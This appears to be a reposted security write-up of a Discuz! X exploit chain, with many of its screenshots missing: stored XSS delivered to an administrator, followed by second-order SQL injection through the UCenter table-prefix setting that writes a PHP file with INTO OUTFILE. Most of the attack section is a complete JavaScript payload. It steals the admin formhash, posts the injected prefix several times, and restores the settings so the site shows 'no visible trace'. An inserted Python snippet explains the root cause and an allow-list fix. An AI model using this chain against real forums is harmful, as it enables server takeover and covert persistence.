Discuz! X xss rebound background no defense SQL Injection getshell

Source: Internet
Author: User


This is a Discuz! X chain: an XSS payload delivered to an administrator rebounds a request into the admin backend, where an SQL injection with no defence leads to getshell. The XSS is only the entry point here; it comes from the log function, which is disabled by default, so enable it to test. This vulnerability should affect all dz versions. I downloaded the latest version and the test passed.

First, enable the log function, then store the XSS payload:

Test an XSS page:


We can go to the article page to see whether the payload has executed:

Now let's see how to deliver this to the administrator. There is a report page below:

This is the report request as an administrator sees it in the backend:

That covers the delivery. Now let's look at the backend, where there is no defence against SQL injection:

We will not walk through the code here; it is convoluted, so instead here is a diagram of the general idea to make it clear.
1. Set the table prefix. The packet capture and replay look like this:

 

2. Modify the table prefix to inject:

 

3. Monitoring the execution of the SQL statements shows the cause of this vulnerability.



A. When it is submitted for the first time, the SQL statement is not executed; submit it a few more times.

B. The data is first written into this table:

As you can see, the input is filtered on its way into this table. But when the data is read back out, it is not escaped again and is used directly from the database. That is the root cause of this vulnerability:
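The root cause described here is second-order SQL injection: the table prefix is escaped when it is written to the settings table, then read back and spliced into a later query as an identifier, where escaping cannot help. This added example (not Discuz! code; Python with sqlite3 standing in for MySQL, and constructed sample prefixes) shows the round trip and the allow-list check that a fixed version needs.

```python
import re
import sqlite3

# Constructed sample prefixes for this demonstration (not taken from the
# page's captured traffic).
SAFE_PREFIX = "pre_ucenter_"
INJECTED_PREFIX = "pre_ucenter_vars union select 1 #"

# A table prefix is an SQL identifier: letters, digits and underscore only.
IDENTIFIER_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def save_setting(conn, key, value):
    """First use of the value: bound as a parameter, so it is stored
    verbatim and cannot break this INSERT. Nothing is sanitised."""
    conn.execute(
        "INSERT OR REPLACE INTO setting(skey, svalue) VALUES (?, ?)", (key, value)
    )


def load_setting(conn, key):
    row = conn.execute("SELECT svalue FROM setting WHERE skey = ?", (key,)).fetchone()
    return row[0] if row else None


def round_trip(prefix):
    """Store the prefix safely, then read it back: the payload survives intact."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE setting(skey TEXT PRIMARY KEY, svalue TEXT)")
    save_setting(conn, "uc_dbtablepre", prefix)
    return load_setting(conn, "uc_dbtablepre")


def build_vars_query_unsafe(prefix):
    """Second use: a table name cannot be a bound parameter, so the stored
    prefix is spliced into the SQL text. This is where the injection lands."""
    return "SELECT name, value FROM " + prefix + "vars"


def is_valid_table_prefix(prefix):
    return IDENTIFIER_RE.fullmatch(prefix) is not None


def build_vars_query_safe(prefix):
    """Hardened form: allow-list the identifier and quote it; never escape it."""
    if not is_valid_table_prefix(prefix):
        raise ValueError("invalid table prefix: %r" % prefix)
    return "SELECT name, value FROM `" + prefix + "vars`"
```

The same check belongs wherever an admin-supplied value becomes part of SQL text rather than a bound parameter.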

Let's check that directory to see whether the shell we want has been generated:

 


Now we need to work out how to chain the two, since the admin form is protected by a formhash. The idea is as follows:



1. First, fetch the settings form page with an ajax GET. As everyone knows, dz embeds a hidden formhash field in the form.

2. With this formhash we send the ajax request again; sending it five times in total gets the shell.



3. Someone is bound to ask why five requests are sent. What are they?

A. The first request gets the formhash.

B. The second and third requests send the constructed packet. Because the first submission is not applied, the first constructed request does not succeed; the previous packet is used and the packet is constructed again, so the shell is only generated when the packet is sent twice.

C. The fourth and fifth requests restore the original settings. The principle is the same.





Next, let's look at our code:



The JS content placed on the remote server is as follows (reflowed from the original one-line listing, with the formhash extraction, the missing semicolon and the second loop counter corrected):

```javascript
function ajax() {
    var request = false;
    if (window.XMLHttpRequest) {
        request = new XMLHttpRequest();
    } else if (window.ActiveXObject) {
        var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP',
            'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',
            'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
        for (var i = 0; i < versions.length; i++) {
            try { request = new ActiveXObject(versions[i]); } catch (e) {}
        }
    }
    return request;
}

var formhash = '';
var cookie = document.cookie;
var _x = ajax();
var base = "http://192.168.10.70/Discuz_X3.2_SC_UTF8/upload/";
var boundary = "---------------------------2137124919446";

request_get();

// Step 1: fetch an admin page to obtain the hidden formhash.
function request_get() {
    var src = base + "admin.php?action=misc&operation=custommenu";
    xhr_act("GET", src, "");
}

// Busy-wait used between the two batches of POSTs.
function sleep(n) {
    var start = new Date().getTime();
    while (true) if (new Date().getTime() - start > n) break;
}

// One multipart/form-data part.
function part(name, value) {
    return "\r\n--" + boundary + "\r\nContent-Disposition: form-data; name=\"" +
        name + "\"\r\n\r\n" + value;
}

// Step 2: post the UCenter settings form. flag == 1 sends the injected
// table prefix; flag == 0 restores the original prefix.
function request_post(flag) {
    var src = base + "admin.php?action=setting&edit=yes";
    var dbtablepre = (flag == 1)
        ? "pre_ucenter_vars union select '<?php phpinfo()?>' into outfile 'D:/APMSERVER/APMServ5.2.6/www/htdocs/Discuz_X3.2_SC_UTF8/upload/data/shell.php'#"
        : "pre_ucenter_";
    var data =
        part("formhash", formhash) +   // the original listing hard-coded the captured value 3cf53a8d
        part("scrolltop", "") +
        part("anchor", "") +
        part("operation", "uc") +
        part("settingnew[uc][appid]", "1") +
        part("settingnew[uc][key]", "********") +
        part("settingnew[uc][api]", base + "uc_server") +
        part("settingnew[uc][ip]", "") +
        part("settingnew[uc][connect]", "mysql") +
        part("settingnew[uc][dbhost]", "localhost") +
        part("settingnew[uc][dbuser]", "root") +
        part("settingnew[uc][dbpass]", "********") +
        part("settingnew[uc][dbname]", "ultrax") +
        part("settingnew[uc][dbtablepre]", dbtablepre) +
        part("settingnew[ucactivation]", "1") +
        part("settingnew[fastactivation]", "0") +
        part("settingnew[avatarmethod]", "0") +
        part("settingsubmit", "提交") +
        "\r\n--" + boundary + "--";
    xhr_act("POST", src, data);
}

function xhr_act(_m, _s, _a) {
    if (_m == "GET") {
        _x.open(_m, _s, false);
        _x.setRequestHeader("Cookie", cookie);   // browsers ignore this header; same-origin cookies are attached anyway
        _x.send();
        var document_str = _x.responseText;
        var basestr = 'name="formhash" value="';
        // The original searched basestr within itself; the response must be searched.
        var formhashpos = document_str.indexOf(basestr);
        if (formhashpos < 0) return;
        formhash = document_str.substr(formhashpos + basestr.length, 8);
        if (formhash) {
            var count_0 = 3;
            var count_1 = 3;
            for (var i = 0; i < count_0; i++) request_post(1);
            sleep(1000);
            for (var j = 0; j < count_1; j++) request_post(0);   // the original incremented i here, looping forever
        }
    } else {
        _x.open(_m, _s, false);
        _x.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + boundary);
        _x.setRequestHeader("Cookie", cookie);
        _x.send(_a);
        return _x.responseText;
    }
}
```


Following the steps above, a shell.php file should now be generated in that directory.

Finally, the site is still accessible as normal, with no visible trace.
